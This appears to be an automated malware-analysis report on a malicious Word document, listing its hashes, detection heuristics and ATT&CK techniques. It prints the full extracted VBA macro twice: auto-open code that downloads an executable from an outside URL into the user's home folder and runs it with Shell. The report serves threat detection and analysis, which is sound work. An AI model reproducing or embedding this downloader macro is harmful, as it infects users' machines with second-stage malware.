Office (OLE) malware analysis — malicious · 14de47908fd2cb59

MALICIOUS

Office (OLE)

34.5 KB Created: 2014-04-14 01:36:00 Authoring application: Microsoft Office Word First seen: 2014-06-27

MD5: c07dcd50b9ba1a1e58a52cac25d60dfd SHA-1: aa51fd9b39824aedf3d9389f3b66028e05bc83d8 SHA-256: 14de47908fd2cb5966ddc9c5cf28402c60799eba085051cb40b28e768919fbc5

354 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File: User Execution T1105 Ingress Tool Transfer

The sample contains VBA macros that utilize the URLDownloadToFileA API to download a second-stage executable from a suspicious URL. The macro then attempts to execute the downloaded file, which is saved to the user's home directory as RBVCRV.exe. The document body's prompt to 'Enable Content' further supports the malicious intent of executing embedded code.

Heuristics 12

ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 7 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
    LIDSIL = Shell(ZYEBSU, 1)
```

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

    Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal NUFWAX As Long, _

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
    Auto_Open
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

    IJYWMV "http://s1.directxex.com/uploads/jsEUfn78Z5TMKDOGc6XxANdR8TYg5FYMpV0McDxq6_Uewz8_2WQMh4nUVrR4Z8l_Z-9tkwrQPeaczXxzRfeZDdaal5xSHIFjF9gB", Environ("HOMEPATH") & "\RBVCRV.exe"

Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://s1.directxex.com/uploads/jsEUfn78Z5TMKDOGc6XxANdR8TYg5FYMpV0McDxq6_Uewz8_2WQMh4nUVrR4Z8l_Z-9tkwrQPeaczXxzRfeZDdaal5xSHIFjF9gB� Referenced by macro
- http://s1.directxex.com/uploads/jsEUfn78Z5TMKDOGc6XxANdR8TYg5FYMpV0McDxq6_Uewz8_2WQMh4nUVrR4Z8l_Z-9tkwrQPeaczXxzRfeZDdaal5xSHIFjF9gBReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1305 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1305 bytes
SHA-256: `65a6bb59b1218d91ca31b2a82ad3da059560bcfbde8c675eb80c97d1bb5acd75`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit #If Win64 Then Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal NUFWAX As Long, _ ByVal RCQMMG As String, ByVal JENRVL As String, ByVal DVBPQD As Long, _ ByVal DFMRPW As Long) As Long #Else Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal NUFWAX As Long, _ ByVal RCQMMG As String, ByVal JENRVL As String, ByVal DVBPQD As Long, _ ByVal DFMRPW As Long) As Long #End If Sub Workbook_Open() Auto_Open End Sub Sub AutoOpen() Auto_Open End Sub Function IJYWMV(KSOAHL As String, ZYEBSU As String) As Boolean Dim KZNUHH As Long KZNUHH = URLDownloadToFileA(0, KSOAHL, ZYEBSU, 0, 0) If KZNUHH = 0 Then IJYWMV = True Dim LIDSIL LIDSIL = Shell(ZYEBSU, 1) End Function Public Sub EEVABV() IJYWMV "http://s1.directxex.com/uploads/jsEUfn78Z5TMKDOGc6XxANdR8TYg5FYMpV0McDxq6_Uewz8_2WQMh4nUVrR4Z8l_Z-9tkwrQPeaczXxzRfeZDdaal5xSHIFjF9gB", Environ("HOMEPATH") & "\RBVCRV.exe" End Sub Sub Auto_Open() EEVABV End Sub

SHA-256: 65a6bb59b1218d91ca31b2a82ad3da059560bcfbde8c675eb80c97d1bb5acd75

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
#If Win64 Then
    Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal NUFWAX As Long, _
ByVal RCQMMG As String, ByVal JENRVL As String, ByVal DVBPQD As Long, _
ByVal DFMRPW As Long) As Long
#Else
    Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal NUFWAX As Long, _
ByVal RCQMMG As String, ByVal JENRVL As String, ByVal DVBPQD As Long, _
ByVal DFMRPW As Long) As Long
#End If
Sub Workbook_Open()
    Auto_Open
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Function IJYWMV(KSOAHL As String, ZYEBSU As String) As Boolean
    Dim KZNUHH As Long
    KZNUHH = URLDownloadToFileA(0, KSOAHL, ZYEBSU, 0, 0)
    If KZNUHH = 0 Then IJYWMV = True
    Dim LIDSIL
    LIDSIL = Shell(ZYEBSU, 1)
End Function
Public Sub EEVABV()
    IJYWMV "http://s1.directxex.com/uploads/jsEUfn78Z5TMKDOGc6XxANdR8TYg5FYMpV0McDxq6_Uewz8_2WQMh4nUVrR4Z8l_Z-9tkwrQPeaczXxzRfeZDdaal5xSHIFjF9gB", Environ("HOMEPATH") & "\RBVCRV.exe"
End Sub
Sub Auto_Open()
EEVABV
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.